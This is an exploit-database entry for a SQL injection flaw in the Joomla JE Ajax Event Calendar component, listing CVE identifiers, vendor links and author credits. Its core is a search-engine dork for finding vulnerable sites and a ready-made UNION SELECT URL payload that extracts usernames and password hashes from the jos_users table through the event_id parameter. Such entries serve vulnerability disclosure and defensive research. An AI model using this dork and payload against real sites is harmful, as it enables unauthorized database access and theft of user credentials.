EXPLOITS

Joomla! Component JE Ajax Event Calendar - SQL Injection

Author: ALTBTA
type: webapps
platform: php
port: 
date_added: 2010-11-25  
date_updated: 2016-12-19  
verified: 0  
codes: CVE-2010-4365;CVE-2010-2513;OSVDB-65828  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15610.txt  

# Vendor:
http://joomlaextensions.co.in/extensions/components/je-ajax-event-calender.html

# Download:
http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/12110

# Author: altbta

# Contact: l_9[at]Hotmail[Dot]com

# Home: http://xp10.com

# Thanks to: rxh  xp10.com >> v4-team.com >> p0c.cc :))

==========================================================================

[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"

==========================================================================

[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--

==========================================================================